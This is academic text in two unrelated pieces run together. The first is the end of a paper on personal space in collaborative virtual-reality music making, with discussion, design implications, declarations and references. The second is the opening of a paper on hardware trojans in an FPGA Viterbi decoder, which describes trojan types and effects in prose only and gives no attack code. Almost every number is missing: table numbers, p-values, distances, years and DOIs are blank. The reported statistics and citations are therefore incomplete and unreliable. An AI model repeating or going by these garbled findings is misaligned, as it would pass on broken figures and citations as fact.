influenced the their spatial locations, changed the formation of group/personal territory they formed and the average distance between collaborators changed, and territoriality-based interaction (group/personal edits) changed. here in caug, by enabling participants to use personal space anywhere inside the stage with no specific triggers needed, caug managed to provide a user experience as similar as possible to cpub. the second reason is more related to the impacts on subjective experience, by making the personal space invisible and gradual, the isolation and difficulty of coordinating that introduced by the additional rigid personal space was minimised. for instance, in the interview, participants reported caug provided a proper level of group work as a working context, making easier to create new that matches the old. movable personal space in cmov in cmov, participants could pop up the personal space anywhere in the stage. in this way, personal spaces was provided with mobility. by doing so, several aforementioned negative effects found in men & bryan-kinns ( ) were reduced. specifically, these include the size of group territory, the average distance, times of paying attention to collaborator (respectively, aa , aa , aa , and aa in table ). however, some significant differences remained, participants still had significantly fewer mutual note modifications, marginal-significantly fewer group edits and significantly more personal edits after personal space being introduced in cfix and cmov (respectively, aa , aa , and aa in table ). this can also be verified by the interview results. compared with caug, participants reported a higher sense of isolation in cmov and cfix, both providing rigid-form personal spaces. namely, cmov, by making the personal space available anywhere in the stage, managed to drag participants closer, saw a similar group territory, however, participants’ behaviour was still affected in many ways. participants were still separated to some extent, which can be seen as a disadvantage of adding visible, solid personal space. in other words, cmov did better than cfix in minimising the negative impacts of adding personal space, but not as good as caug. a more rigid personal space in cfix cfix provided a much more inflexible personal space, which influenced participants’ behaviour in many ways (see the significant differences between cpub and cfix in tables and ). not to mention participants’ polarised ratings on cpub and cfix in cq , cq , men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cq , cq of table : significantly many participants reported the least difficulty of tracking collaborator’s activities (cq ), the strongest sense of their collaborator’s presence (cq ), the best communication quality (cq ), the least difficulty of cooperating with collaborator (cq ) happened in cpub, whilst cfix was thought conversely by significantly many participants. their dislike of cfix can also be seen in the interviews, in which the number of coded segments favouring cfix and the number of segments reporting its advantages are the lowest, whist the number of segments disfavouring it and the number of segments reporting its disadvantages are the highest among the four conditions. providing personal space with fluid boundary measures in table show that caug significantly differs from cfix and cmov in many ways. when both significant differences (p < . ) and marginal-significant differences (p < . ) are considered, compared with cfix and cmov, caug saw a smaller personal territory (aa ) and a bigger group territory (aa ), more mutual modifications (aa ), more group edits (aa ) and fewer personal edits (aa ), a larger distance between collaborators (aa ), more times of paying close attention (aa ) and a longer time of paying close attention (aa ). all these indicate that compared with the rigid personal space provided in cfix and cmov, the augmented acoustic attenuation in caug enabled a closer collaboration, h is therefore supported. caug’s advantages are shown in three ways, next, each will be specified. enough support for creativity with minimal impacts psq (table ) questioned the support each condition gave to individual creativity. although no significant differences were found, caug has a higher mean rating, possibly indicating a higher level of support. it should be noted that all the questions in psq were phrased either positively (psq , psq , psq , psq , psq ) or neutrally (the rest), with no negative statements, which might have affected participants’ ratings positively. however, this imperfection has a limited influence on this study, because psq results are mostly used for comparisons between conditions, which are affected equally due to all of the conditions using the same phrasing. more insights regarding caug’s helpfulness are revealed by the thematic analysis, according to which, caug provided both ‘‘an appropriate background’’ with which participants felt ‘‘less stressed’’ and were able to ‘‘tailor’’ the individual composing to match the co-work, and a space personal enough to ‘‘work on something individually’’. no major differences were found between cpub and caug, indicating caug provides a very mild solution, with limited impacts on people’s collaborative behaviour being introduced, whilst still providing sufficient support for individual creativity during collaboration. thus h is validated. closer collaboration and higher consistency according to measures of attention (aa , aa , aa , aa in table ), compared with other conditions, in caug participants paid more close attention to their collaborator. possible reasons for this can be found from the thematic analysis and other measures of activity assessments (table ). compared with realistic acoustic attenuation in cpub, caug’s augmented acoustic attenuation setting forced or prompted people to work closer in order to hear each other’s work, as reported by some participants. compared with men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. adding personal space with visible rigid boundary, by enabling participants to ‘‘decide’’ whether to hear other’s work or not ‘‘in a continuous way’’, an invisible gradual boundary in caug led to less separation, and higher consistency between personal and public space, which matches the finding that people would like to be able to smoothly shift their artifacts from personal to public with intermediate shades in-between (greenberg, boyle & laberge, ). compared with rigid personal spaces in cfix and cmov, caug saw more mutual note modifications, more group note edits, and larger group territory, a closer average distance between collaborators (respectively, aa , aa , aa , and aa in table ), all of these indicate that caug saw a less separated collaboration than cfix and cmov. compared with the three levels of privacy provided in ubitable (shen, everitt & ryall, ) and the binary levels of privacy provided in sharednote (greenberg, boyle & laberge, ), the step-less sonic privacy provided by caug in this study possibly managed to better echo the suggestion that a boundary between personal and public space should be provided with gradations in subtle and lightweight ways to enable a fluid shift (greenberg, boyle & laberge, ), h is therefore supported. popularity the code ‘‘advantage of caug’’ has coded segments, which is far more than the segments other codes have. thirty-five coded segments are ‘‘most favourite—caug’’, higher than all other three conditions. these indicate caug is the most popular condition. this can also be partially verified by the preference measure. specifically, caug has the highest preference rating in psq (table ), and more participants chose caug as the setting they most enjoyed in cq (in table ). we believe the reasons behind this popularity are mainly due to its unique advantages, which as reported by participants, includes: (i) higher team cohesion and less sense of separation, (ii) an appropriate environment for creativity, (iii) easier to identify sounds and (iv) more real (though in fact, cpub is more real from the perspective of simulation). these features of caug made it provide better support for collaborative creativity and therefore led to its popularity. providing personal space without/with mobility this subsection compares cfix with cmov. the clear, sole difference between these two conditions is the mobility of personal space. in cfix, to access personal spaces at the corners, participants needed to physically walk away from the centre and head to the corner, which might be the reason that cmov saw a closer average distance between collaborators than cfix (aa , table ). this greater distance in cfix possibly resulted the significantly larger size of personal territories (aa ) and more personal edits (aa ) in cfix. on the contrary, the closer distance in cmov created more chances for participants to pay or draw attention between each other, as a result, significantly longer time was spent paying attention to collaborators (aa , aa in table ). with a closer average distance and more attention paid to each other, participants reported they had a marginal-significantly better quality of communication in cmov (psq of table ). on the other hand, with participants being far away from each other and less chances for contact in cfix, significantly many participants reported that they had the worst communication quality in cfix (cq , table men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ). cmov was also rated by much fewer participants to be the least enjoyable condition than compared with cfix (cq , table ). besides, cfix also led to a reduced sense of collaborator’s contribution (cq in table ). as a possible result, cmov saw a significantly more satisfying work output (psq , table ). the thematic analysis results also echo these findings. more coded segments are reporting cmov’s advantages compared with those reporting cfix’s, with more coded segments reporting cfix’s disadvantages than those reporting cmov’s. also, more coded segments are favouring cmov compared those favouring cfix. participants reported being able to use personal space anywhere in the stage with the personal space was good as it resulted in a closer distance, which led to more collaboration and made it possible to see each other’s work. to conclude, compared with cfix, cmov resulted in a better communication quality, produced better feeling of collaborator’s contributions, and was rated more enjoyable, thus it saw a closer collaboration and produced a more satisfying result, h is therefore supported. key findings in summary, the following are key findings from our results: • having personal space is suggested as it supports individual creativity, which is an important element of the collaborative creativity. • caug minimised the negative impacts introduced by adding personal space (previously identified by men & bryan-kinns, ) better than cfix and cmov. • caug was found to have the most minimal impacts and even to influence the attention between collaborators positively. both cfix and cmov produced a more alienated collaboration, indicators of which include significantly bigger personal territory and more personal edits, and significantly fewer mutual note modifications and fewer group edits, significantly lower sense of collaborator’s activity. additionally, cfix saw significantly more note edits, and significantly less ordinary attention paid between collaborators. • providing personal space with a fluid boundary is preferable, it provides enough support for individual creativity with the minimal cost, and can even lead to a closer collaboration (specifically, greater attention was paid between collaborators). • compared with stationary personal space, space with mobility led to better communication, produced a better feeling of collaborator’s contribution, had a higher rating in enjoyment, and produced a more satisfying output, and thus it supported collaboration better than stationary personal space. design implications based on the key points made above, we suggest five design implications for sves focusing on supporting creative collaboration (point is for audio-related task only): ( ) sves supporting creative collaboration tasks should come with personal space, as it provides essential support for the development of individual creativity, which forms a key part of the collaborative creativity. this is especially essential when the output of the men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. task is more disruptive (e.g., audio), co-workers need a space where they can think of and develop own mind and work. ( ) for audio-related tasks (e.g., collaborative music making), manipulating acoustic attenuation as personal space is an effective way to support both individual creativity and collaboration. it allows users to shift between personal and public working space continuously by adjusting their relative distance. it comes with light-weight form, functions as a personal space well, and can increase close attention paid between participants. besides, based on our finding, it does not introduce significantly negative impacts whereas rigid personal space does. ( ) beyond audio-related tasks, when providing personal space in sves, lightweight free-form personal space rather than personal space with rigid form should still be firstly considered, as it introduces fewer negative impacts on collaboration and enables a fluid shift, which matches the findings of greenberg, boyle & laberge ( ). the basis of providing light-weight privacy is not limited to audio, it can be provided by other modalitie(s) as well (e.g., visual). for example, in this study, augmented attenuation in sound has been verified to provide a useful personal space for cmm in sves. similarly, a visual augmentation might be used for vision-related collaborative tasks (e.g., collaborative drawing) in sves. multiple modalities can also be used simultaneously for tasks involving multiple modals, an example task can be making a short animation and creating an accompanying music track for it. ( ) manipulating the level of augmentation (e.g., the augmented acoustic attenuation in this study) can change the level of feeling personal. in the caug condition of this study, participants adjusted their distance between themselves and collaborators to obtain a different level of being personal (herein referred as ‘‘personalness’’), e.g., total isolation can be achieved if both participants are working with a distance greater than . metres. we believe similarly, when personal spaces are provided with gradual and adjustable boundary, manipulating the parameter of the boundary (e.g., the degree of augmented attenuation) can impact the level of ‘‘personalness’’ and therefore adjust the impact of introducing personal space. for example, the augmented attenuation can be set to a very low level if an extremely minimal impact is being pursued. so adding a method enabling users to adjust the level can allow users to shift between having a ‘‘very personal’’ space with total isolation where they could not hear nor see each other’s work, and having no personal space when they have to work together. in this way, users can be enabled to manipulate the level between ‘‘personalness’’ and togetherness continuously, which is useful to allow users to develop own ideas and work together to tailor own work into the collaborative piece. compared with adjusting ‘‘personalness’’ by distance in caug, adjusting it by changing the parameter might also be useful as co-workers can then stay anywhere whilst still being able to adjust the ‘‘personalness’’ that the personal space provides. ( ) when it is hard or impossible to design a gradual, light-weight personal space that applicable to the task due to the type of the task, and a rigid-form personal has to be considered, it is better to provide rigid personal space with mobility, as the mobility feature gives users more freedom for accessing the personal spaces, and produces a better user men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. experience with fewer negative impacts on the collaboration compared with rigid personal space without mobility. this implication also echoes the proposal raised in our previous work (men & bryan-kinns, ). conclusions in this article, we have briefed an experiment exploring how four different spatial configurations impact the collaboration differently. both quantitative and qualitative data were demonstrated and analysed, comparisons between conditions were made, differences were found and five design implications were given. specifically, augmented attenuation can support the individual creativity and the fluid shift between group activitiy and individual activity well during collaboration in sve, with minimal negative impacts on collaboration introduced. we also found that a rigid personal space with mobility serves users’ needs better and is preferable over a non-mobile one. in the future, we are keen to explore how to design and apply personal spaces with fluid boundaries in a wider range of creative scenarios in sves, e.g., for collaborative drawing in an sve, personal space (visual privacy) might be provided by creating a foggy environment, the more far away from the drawing objects are, the more blurry the collaborators perceive them. we are also interested in how the boundary might be manipulated and whether the manipulation can result in different impacts on the collaborative behaviour. additional information and declarations funding this work was supported by epsrc and ahrc centre for doctoral training in media and arts technology (ep/l x/ ) and china scholarship council. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: epsrc and ahrc centre for doctoral training in media and arts technology: ep/l x/ . china scholarship council. competing interests the authors declare there are no competing interests. author contributions • liang men conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft of the manuscript submitted for review and publication. men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • nick bryan-kinns conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft of the manuscript submitted for review and publication. • louise bryce authored or reviewed drafts of the paper, analyzed the data, approved the final draft of the manuscript submitted for review and publication. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the queen mary research ethics committee granted ethical approval to carry out the study within its facilities (ethical application ref: qmrec ). data availability the following information was supplied regarding data availability: the vr system of lemo is available at: men, liang ( ): unity package for lemo—a multiplayer music making prototype. figshare. online resource. https: //doi.org/ . /m .figshare. .v . data is available at: men, liang ( ): raw data of paper ‘‘designing virtual spaces to support collaborative creativity’’. figshare. dataset. https://doi.org/ . /m .figshare. .v . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references altman i. . the environment and social behavior: privacy, personal space, territory, and crowding. monterey: brooks/cole pub. co., inc. barbosa Á. . displaced soundscapes: a survey of network systems for music and sonic art creation. leonardo music journal : – doi . / . basdogan c, ho c-h, srinivasan ma, slater m. . an experimental study on the role of touch in shared virtual environments. acm transactions on computer-human interaction ( ): – doi . / . . benford s, greenhalgh c, rodden t., pycock j. . collaborative virtual environ- ments. communications of the acm ( ): – . billinghurst m, kato h. . collaborative augmented reality. communications of the acm ( ): – . billinghurst m, poupyrev i, kato h, may r. . mixing realities in shared space: an augmented reality interface for collaborative computing. in: ieee international conference on multimedia and expo. icme . proceedings. latest advances in the fast changing world of multimedia (cat. no. th ). piscataway: ieee, – doi . /icme. . . men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v https://doi.org/ . /m .figshare. .v https://doi.org/ . /m .figshare. .v https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /icme. . http://dx.doi.org/ . /peerj-cs. bishop g, fuchs h. . research directions in virtual environments: report of an nsf invitational workshop, march – , , university of north car- olina at chapel hill. acm siggraph computer graphics ( ): – doi . / . . blaine t, fels s. . contexts of collaborative musical experiences. in: proceedings of the conference on new interfaces for musical expression (nime). national university of singapore, – . braun v, clarke v. . using thematic analysis in psychology. qualitative research in psychology ( ): – doi . / qp oa. bressan f, vets t, leman m. . a multimodal interactive installation for collabora- tive music making: from preservation to enhanced user design. in: proceedings of the european society for cognitive sciences of music (escom) conference, ghent university. – . bryan-kinns n. . daisyphone: the design and impact of a novel environment for remote group music improvisation. in: proceedings of the th conference on designing interactive systems: processes, practices, methods, and techniques. acm, – . bryan-kinns n. . mutual engagement and collocation with shared repre- sentations. international journal of human-computer studies ( ): – doi . /j.ijhcs. . . . bryan-kinns n, hamilton f. . identifying mutual engagement. behaviour & information technology ( ): – doi . / . bryan-kinns n, healey pg, leach j. . exploring mutual engagement in creative collaborations. in: proceedings of the th acm sigchi conference on creativity & cognition. new york: acm, – . carlsson c, hagsand o. . dive a multi-user virtual reality system. in: proceedings of ieee virtual reality annual international symposium. piscataway: ieee, – . case da, ploog bo, fantino e. . observing behavior in a computer game. journal of the experimental analysis of behavior ( ): – doi . /jeab. . - . fencott r, bryan-kinns n. . hey man, you’re invading my personal space! privacy and awareness in collaborative music. in: proceedings of the conference on new interfaces for musical expression (nime). available at http://www.eecs.qmul.ac.uk/ ~nickbk/papers/p _fencott.pdf . gaver ww. . the affordances of media spaces for collaboration. in: proceedings of the acm conference on computer-supported cooperative work. acm, – . greenberg s, boyle m, laberge j. . pdas and shared public displays: making personal information public, and public information personal. personal technologies ( – ): – doi . /bf . hall et. . the hidden dimension. vol. . garden city: doubleday. hendrix c, barfield w. . the sense of presence within auditory virtual en- vironments. presence: teleoperators & virtual environments ( ): – doi . /pres. . . . . kreijns k, kirschner pa, jochems w. . identifying the pitfalls for social interaction in computer-supported collaborative learning environments: a review of the men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / qp oa http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . / http://dx.doi.org/ . /jeab. . - http://www.eecs.qmul.ac.uk/~nickbk/papers/p _fencott.pdf http://www.eecs.qmul.ac.uk/~nickbk/papers/p _fencott.pdf http://dx.doi.org/ . /bf http://dx.doi.org/ . /pres. . . . http://dx.doi.org/ . /peerj-cs. research. computers in human behavior ( ): – doi . /s - ( ) - . kruger r, carpendale s, scott sd, greenberg s. . roles of orientation in tabletop collaboration: comprehension, coordination and communication. computer supported cooperative work ( – ): – doi . /s - - - . lea r, honda y, matsuda k. . virtual society: collaboration in d spaces on the internet. computer supported cooperative work ( ): – doi . /a: . luciani a. . virtual reality and virtual environment. in: enaction and enactive interfaces: a handbook of terms. grenoble: enactive systems book acroe, – . men l, bryan-kinns n. . lemo: supporting collaborative music making in virtual reality. in: ieee th vr workshop on sonic interactions for virtual environments (sive). piscataway: ieee, – doi . /sive. . . men l, bryan-kinns n. . lemo: exploring virtual space for collaborative creativity. in: proceedings of the on creativity and cognition, c&# ;c ’ . new york: acm, – doi . / . . men l, bryan-kinns n, hassard as, ma z. . the impact of transitions on user experience in virtual reality. in: ieee virtual reality (vr). – doi . /vr. . . nassiri n, powell n, moore d. . human interactions and personal space in collaborative virtual environments. virtual reality ( ): – doi . /s - - - . nedel l, de souza vc, menin a, sebben l, oliveira j, faria f, maciel a. . using immersive virtual reality to reduce work accidents in developing countries. ieee computer graphics and applications ( ): – . pinelle d, gutwin c, greenberg s. . task analysis for groupware usability evaluation: modeling shared-workspace tasks with the mechanics of collab- oration. acm transactions on computer-human interaction ( ): – doi . / . . raffestin c. . space, territory, and territoriality. environment and planning d: society and space ( ): – doi . /d . rodden t. . a survey of cscw systems. interacting with computers ( ): – doi . / - ( ) - . roussos m, johnson ae, leigh j, vasilakis ca, barnes cr, moher tg. . nice: combining constructionism, narrative and collaboration in a vir- tual learning environment. acm siggraph computer graphics : – doi . / . . sack rd. . human territoriality: a theory. annals of the association of american geographers ( ): – doi . /j. - . .tb .x. schroeder r. . social interaction in virtual environments: key issues, common themes, and a framework for research. in: the social life of avatars: presence and interaction in shared virtual environments. berlin, heidelberg: springer-verlag, – . men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /a: http://dx.doi.org/ . /sive. . http://dx.doi.org/ . / . http://dx.doi.org/ . /vr. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . http://dx.doi.org/ . /d http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /peerj-cs. schubert t, friedmann f, regenbrecht h. . the experience of presence: factor analytic insights. presence: teleoperators & virtual environments ( ): – doi . / . scott sd, carpendale s. . theory of tabletop territoriality. in: tabletops-horizontal interactive displays. london: springer, – . scott sd, carpendale mst, inkpen km. . territoriality in collaborative tabletop workspaces. in: proceedings of the acm conference on computer supported cooperative work. new york: acm, – . shen c, everitt k, ryall k. . ubitable: impromptu face-to-face collaboration on horizontal interactive surfaces. in: dey ak, schmidt a, mccarthy jf, eds. ubicomp : ubiquitous computing. ubicomp . lecture notes in computer science, vol. . berlin, heidelberg: springer, – . steuer j. . defining virtual reality: dimensions determining telepresence. journal of communication ( ): – . sugimoto m, hosoi k, hashizume h. . caretta: a system for supporting face-to- face collaboration by integrating personal and shared spaces. in: proceedings of the sigchi conference on human factors in computing systems. new york: acm, – . tang jc. . findings from observational studies of collaborative work. international journal of man-machine studies ( ): – doi . / - ( ) -a. titon jt, slobin m. . the music-culture as a world of music. in: worlds of music: an introduction to the music of the world’s peoples. new york: schirmer books. turchet l, fischione c, essl g, keller d, barthet m. . internet of musical things: vi- sion and challenges. ieee access : – doi . /access. . . wang g. . designing smule’s ocarina: the iphone’s magic flute. in: proceedings of the conference on new interfaces for musical expression (nime). – . xambó a, hornecker e, marshall p, jordà s, dobbyn c, laney r. . let’s jam the reactable: peer learning during musical improvisation with a tabletop tangible interface. acm transactions on computer-human interaction ( ):article . yin rk. . case study research and applications: design and methods. thousand oaks: sage publications. zhang x, furnas gw. . the effectiveness of multiscale collaboration in virtual environments. in: chi’ extended abstracts on human factors in computing systems. new york: acm, – . men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . / - ( ) -a http://dx.doi.org/ . /access. . http://dx.doi.org/ . /peerj-cs. a viterbi decoder and its hardware trojan models: an fpga-based implementation study a viterbi decoder and its hardware trojan models: an fpga-based implementation study varsha kakkara ,*, karthi balasubramanian , b. yamuna , deepak mishra , karthikeyan lingasubramanian and senthil murugan ,* department of electronics and communication engineering, amrita school of engineering, amrita vishwa vidyapeetham, coimbatore, tamil nadu, india digital communication division (dcd), optical and digital communication group (odcg), satcom navigation payload area (snpa), space application center (sac), isro, ahmedabad, gujarat, india electrical and computer engineering, university of alabama, birmingham, al, usa department of electronics and communication engineering, amrita school of engineering, amrita vishwa vidyapeetham, amritapuri, kerala, india * these authors contributed equally to this work. abstract integrated circuits may be vulnerable to hardware trojan attacks during its design or fabrication phases. this article is a case study of the design of a viterbi decoder and the effect of hardware trojans on a coded communication system employing the viterbi decoder. design of a viterbi decoder and possible hardware trojan models for the same are proposed. an fpga-based implementation of the decoder and the associated trojan circuits have been discussed. the noise-added encoded input data stream is stored in the block ram of the fpga and the decoded data stream is monitored on the pc through an universal asynchronous receiver transmitter interface. the implementation results show that there is barely any change in the luts used ( . %) and power dissipation ( %) due to the insertion of the proposed trojan circuits, thus establishing the surreptitious nature of the trojan. in spite of the fact that the trojans cause negligible changes in the circuit parameters, there are significant changes in the bit error rate (ber) due to the presence of trojans. in the absence of trojans, ber drops down to zero for signal to noise rations (snrs) higher than db, but with the presence of trojans, ber doesn’t reduce to zero even at a very high snrs. this is true even with the trojan being activated only once during the entire duration of the transmission. subjects computer architecture, mobile and ubiquitous computing, security and privacy keywords coded communication system, hardware trojan, viterbi decoder, bit error rate introduction the entry of connected technologies into the realms of internet of things (iot) and cyber physical systems (cps) has made it imperative for communications systems to be protected from possible threats. these threats can arise from both software externals and hardware internals. while considerable emphasis is being given to software level threats, in this work we focus on the hardware level threats. the hardware of a communication system can be compromised if its design is exposed so that it can be modified or duplicated. how to cite this article kakkara v, balasubramanian k, yamuna b, mishra d, lingasubramanian k, murugan s. . a viterbi decoder and its hardware trojan models: an fpga-based implementation study. peerj comput. sci. :e doi . /peerj-cs. submitted may accepted december published march corresponding author karthi balasubramanian, b_karthi@cb.amrita.edu academic editor miriam leeser additional information and declarations can be found on page doi . /peerj-cs. copyright kakkara et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:b_karthi@�cb.�amrita.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ this allows an adversary to deteriorate the performance of a communication system and expose the system to attacks. this makes understanding of the hardware level threats significant. in this work, we focus on the effect of one such threat called hardware trojans, on coded communication systems that use a viterbi decoder as the error correcting unit. overview of coded communication system design of efficient coder–decoder for error control has received increased interest in recent years. this is due to the fact that all digital transmission and storage requires error control strategy to ensure reliability. information symbols from a source are encoded by the addition of controlled redundancy. convolutional codes and block codes are the broad classification of error control codes. an error control decoder makes the best estimate of the transmitted codeword by making use of the redundancy added at the encoder. the transmitted codewords are encoded information symbols that are subject to errors, in the process of transmission through noisy communication channels. these transmitted codewords can be decoded with as low bit error rate (ber) as possible for transmission rates upto the channel capacity (sweeney, ). the block level representation of a coded communication system is shown in fig. . hardware trojans in the current scenario of integrated circuits (ics) manufacturing, a globalized business model has emerged where ics are manufactured in foundries that are distributed in various parts of the world. a hardware trojan is a malicious stealthy modification that leads to malfunctioning of the system (colins, ). such modifications in the system provides a back door entry for the trojans. the three main categories of hardware trojans are based on their action, physical and activation characteristics (chakraborty, narasimhan & bhunia, ; tehranipoor & koushanfar, ; karri et al., , banga et al., ; ranjani & devi, ). the physical characteristics category describes the various hardware manifestations of trojans according to their shape and figure coded communication system. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ size; the activation characteristics describe the conditions that activate the trojans and action characteristics refer to the behavior of the trojans. figure gives the classification of trojans based on insertion phase, abstraction level, activation mechanism and effects. hardware trojans can be inserted at different stages of ic design cycle, while the most prevalent phases are design and fabrication. likewise, trojans can be realized at different levels of ic design abstraction and can be designed to get triggered internally by specific states of the system, or externally through any communication medium. the former can be stealthy based on the occurrence of the problem states, while the latter will be untraceable in test phase because it is not triggered internally. regarding the effect of trojans on the affected system, they are generally designed by the adversary to change functionality or leak sensitive information or deny service during critical instances or compromise the communication system and reduce the reliability of the design (karri et al., ). there are numerous post manufacturing techniques for detecting trojans but a single technique is difficult to be devised for detecting trojans universally. side channel and logic testing form the two classical trojan detection techniques (narasimhan et al., ). in these two methods, a golden circuit is used to compare with outputs of the circuit under test. typically, trojans are devised to activate rarely to escape logic testing and evade detection. they also possess small physical characteristics to evade side channel based testing. trojan modeling trojans are generally modeled for the specific design of interest that they intended to disrupt. examples of trojan benchmark circuits aimed at infecting systems like advanced encryption system, serial interface rs , ethernet mac, and pic microcontrollers can be found at (trusthub, ). these circuit models have been widely used to study the effectiveness of trojan infection and to design measures to thwart them. to study the trojan effect on other systems, custom trojan models are designed. a few figure hardware trojan taxonomy. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ studies that have been done in recent years on a system level using custom trojan models are listed below: . saeidi & garakani ( ): multiple hardware trojans have been designed for a × array of six transistor sram block, that either corrupt the output or modify the delay and duty cycle of the enable signals. the trojans are trigged by an address sequence that is not generally produced in conventional testing methodology, thereby helping them to evade detection by conventional sram testing. . tiwari et al. ( ): a hardware trojan model has been proposed for launching denial of service attack to on-chip multicast routing algorithms. the trojan is modeled to use the on-chip temperature sensor information to identify suitable nodes and launch attack on multicast data packets. . liu et al. ( ): the design and custom silicon implementation of secret key leaking trojans present in the ultrawide band transmitter of a wireless cryptographic ic has been presented. the trojan circuit leaks the encryption key without disrupting the normal operation. this is achieved by hiding the key in the power amplitude and frequency margins that are acceptable due to process variations. . kumar et al. ( ): novel hardware trojans are proposed that induces denial of service and performance degradation in a network on chip. the trojan is triggered by a complex bit pattern generated from input messages, intended toward misleading the packets away from the destination address. . subramani et al. ( ): hardware trojan attack is modeled by modifying the encoder block of a . a/g transmitter. this is accomplished by hijacking some of the legitimately encoded bits and substituting with rogue bits. trojan modeling of channel decoders channel decoders are a quintessential part of any coded communication system. they are soft targets for trojan attacks and can be embedded with malicious blocks for the following reasons: (hemati, ). . they have a direct interface with the outside world that make them susceptible to being hijacked. . they process noisy information that makes it impossible for a even a perfectly functional decoder to be successful all the time. hence a trojan affected system may easily claim false failures and masquerade its real purpose. . brute force approach of running all test cases to identify malicious activity is not practical with even a medium size block length since the number of input and output combinations will be huge. in spite of the fact that channel decoders are highly susceptible to trojan attacks, the effects of trojans on them hasn’t been explored in literature. hemati ( ) have proposed the use of stochastic techniques at a system level for mitigating trojan effects in a channel decoder but an rtl level analysis is missing. our work involves the proposal and kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ analysis of possible trojans on a specific channel decoder namely, the viterbi decoder. the work is concentrated toward rtl design of a viterbi decoder and possible trojans that may potentially compromise the communication system and reduce the reliability of the decoder. viterbi algorithm is widely used for decoding convolutional codes since it achieves maximum likelihood estimate of the convolutionally coded transmitted sequence (forney, ). a low ber can be achieved by a viterbi decoder (viterbi, ). however the presence of trojans can affect the performance of the decoder significantly. this has been demonstrated with a proof of concept in our earlier work (aravind et al., ). trojan models were proposed and behavioral modeling studies at the algorithmic level showed that the ber performance of convolution decoder using the viterbi algorithm is degraded due to the presence of the hardware trojans. the current work extends this proof of concept to a rtl level circuit design of the decoder and the trojan activities. a practical implementation of the viterbi decoder is achieved and the trojan effects on the system is analyzed. the article is organized as follows. the viterbi decoder section details the reader about the viterbi algorithm with a suitable example. this is followed by the section on the hardware design of the decoder for fpga implementation. results from simulation and fpga implementation of the decoder are discussed after that, followed by the section on the design of the trojans. results and discussions on the trojan based design are presented and the article then concludes with references to possible future work. viterbi decoder the n encoded output in a (n, k, m) convolutional code depends on the k present input blocks as well the m past input blocks. a memory m sequential circuit is used for realizing the convolutional encoder. the trellis diagram of the rate half, m = , convolutional encoder is shown in fig. . the corresponding state diagram of the trellis is shown in fig. . figure trellis structure of the convolutional encoder. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the state transitions and the outputs reached in response to changes in input are represented in the state diagram. in the trellis diagram the same information is described in stages which represent the different time instants. with states representing the past memory contents of the encoder and branches representing the state transitions, the trellis path traced by the viterbi decoder is a sequence of branches. the input message bit corresponding to each branch in the sequence of branches represent the decoded message sequence. by adding terminating zeros to the message sequence it is ensured that the decoder always starts in an all-zero initial state for decoding a message sequence. a detailed example showing the decoding procedure may be found in the supplemental document. fpga based viterbi decoder design the viterbi decoder was designed in verilog and implemented on a xilinx zybo-z board. figure shows the top level implementation structure that includes the core decoder block, a single port block ram (bram) of size × , to store the input data figure state transitions of the encoder. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and a single port block ram of size × to store the decoded data. along with these, an universal asynchronous receiver transmitter (uart) transmitter module is also integrated to monitor the decoded data on a pc. input interface the noise added encoded message is stored in the input bram and data is transferred to the decoder block through the input interface. the interface logic unit consists of a counter and an eight bit shit register as shown in fig. . it reads the data byte-wise from the bram and transmits two bits per 